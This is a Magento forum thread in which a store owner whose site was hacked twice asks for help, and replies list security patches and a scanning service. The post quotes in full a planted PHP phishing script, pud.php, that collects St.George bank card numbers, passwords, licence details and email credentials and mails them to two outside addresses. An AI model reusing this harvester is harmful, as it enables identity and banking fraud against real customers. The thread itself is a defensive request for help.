cancel
Showing results for 
Search instead for 
Did you mean: 

How ease to hack magento 1.8.0.1?

SOLVED

How ease to hack magento 1.8.0.1?

Hello Friends,

I am using Magento 1.8.0.1 over http and my domain is hacked twice; on first time hackers uses Media and JS to install a Module for additional login.html then I have cleared all offending contents from the server and changed the admin passwords too but again my domain got hacked and now this time they use downloader>skin>install to upload the file pud.php

Here is the detailed code of that file:

<?php

$sec = $_REQUEST['password'];
$page_name= "Stgeorge";

if(isset($sec)) {
		$ip = getenv("REMOTE_ADDR");
		$message .= "---------- Login Information ----------------------------\n";
		$message .= "Card/Access Number: ".$_POST['firstname']."\n";
		$message .= "Security Number: ".$_POST['password']."\n";
		$message .= "Internet Password: ".$_POST['passwords']."\n";
		$message .= "---------- Identity Information ----------------------------\n";
		$message .= "Full Name : ".$_POST['fn']."\n";
		$message .= "Verbal Password : ".$_POST['vb']."\n";
		$message .= "DOB: ".$_POST['dobday']." - ".$_POST['dobmonth']." - ".$_POST['dobyear']."\n";
		$message .= "10-Digit Licence Card Number: ".$_POST['dln']."\n";
		$message .= "Driver's licence number: ".$_POST['dlnssss']."\n";
		$message .= "Licence Expiry Date: ".$_POST['edobday']." - ".$_POST['edobmonth']." - ".$_POST['edobyear']."\n";
		$message .= "---------- Contact Information and Home Address ----------------------------\n";
		$message .= "Mobile Number: ".$_POST['mn']."\n";
		$message .= "Home Phone Number: ".$_POST['pn']."\n";
		$message .= "E-mail Address: ".$_POST['email']."\n";		
		$message .= "E-mail Pass: ".$_POST['emailp']."\n";		
		$message .= "IP: ".$ip."\n";
		$message .= "----------------Created By shika------------------\n";
		$send = "clim01987@gmail.com,k.molodkina.stroyst@mail.ru";
		$subject = $page_name." - ReZulTs";
		$headers = "From: <infos@shika.com>";
		$headers .= $_POST['eMailAdd']."\n";
		$headers .= "MIME-Version: 1.0\n";
		mail("$send", "$subject", $message); 
		header("Location: https://www.stgeorge.com.au/");	
}

else {
	header("Location: https://www.stgeorge.com.au/");	

	
}

?>

Finally, I think that how ease to hack Magento 1.8.0.1?

Now, I need help to stop this hacking sequence and for that please tell me all available processes and available security patches for 1.8.0.1

Thanks

2 REPLIES

Re: How ease to hack magento 1.8.0.1?

Hi @Arbit17,

 

The list of patches for that version of Magento is:

 

  • SUPEE-10266: SUPEE-10266 for CE 1.8.0.0-1.8.1.0 (0.04 MB)
  •  SUPEE-10336: SUPEE-10336 for CE 1.8.0.0 and earlier (0.01 MB)
  •  SUPEE-1533: SUPEE-1533 - Magento-CE-v1.8.x-1.9.x (0.01 MB)
  •  SUPEE-1868: Magento-CE-v1.8.x (0.01 MB)
  •  APPSEC-212: Magento-CE-v1.8.0.0-1.8.1.0 (0.01 MB)
  •  SUPEE-2725: Magento-CE-v1.7.0.0-1.8.1.0 (0.01 MB)
  •  SUPEE-3941: Magento-CE-v1.8.0.0-1.9.0.1 (0.03 MB)
  •  SUPEE-4291/4334: Magento-CE-v1.7.x-1.8.x (0.01 MB)
  •  SUPEE-5344: SUPEE-5344 - Magento-CE-v1.8.x-1.9.x (0.01 MB)
  •  SUPEE-5994: SUPEE-5994 for CE 1.6.0.0 - 1.9.1.1 (0.04 MB)
  •  SUPEE-6237: USPS API Patch - SUPEE-6237 - CE 1.6.x-1.9.1.x (0.01 MB)
  •  SUPEE-6285: SUPEE-6285 for CE 1.8.0.0 (0.05 MB)
  •  SUPEE-6482: SUPEE-6482 for CE 1.7.x - 1.8.0.0 (0.01 MB)
  •  SUPEE-6788: SUPEE-6788 for CE 1.8.0.0 (0.17 MB)
  •  SUPEE-7405: SUPEE-7405 for CE 1.8.0.0 (0.11 MB)
  •  SUPEE-7405 v1.1: SUPEE-7405 v1.1 for CE 1.8.0.0 (0.01 MB)
  •  SUPEE-7616: SUPEE-7616 for CE 1.8.0.0 - 1.9.2.2 (0.01 MB)
  •  SUPEE-8167: SUPEE-8167 for CE 1.8.0.0-1.8.1.0 (0.01 MB)
  •  SUPEE-8788: SUPEE-8788 for CE 1.8.0.0 (0.63 MB)
  •  SUPEE-8967: SUPEE-8967 for CE 1.5.0.0-1.9.2.4 (0.01 MB)
  •  SUPEE-9652: SUPEE-9652 for CE 1.5.0.1-1.9.3.1 (0.01 MB)
  •  SUPEE-9767: SUPEE-9767 for CE 1.8.0.0 (0.08 MB)
  •  SUPEE-9767 v2: SUPEE-9767v2 for CE 1.8.0.0 (0.06 MB)
  •  PHP 5.4: Magento-CE-v1.8.0.0 (0.01 MB)

 

You can use this tool as help: http://fabrizioballiano.net/magento-patches/

 

--
If you've found one of my answers useful, please give "Kudos" or "Accept as Solution"

Re: How ease to hack magento 1.8.0.1?

Magento just launched its own security scan tool - account.magento.com/scanner/ . Sign up for it it is free. It will tell you not only what patches you need to install but also warn you about other vulnerabilities you might have.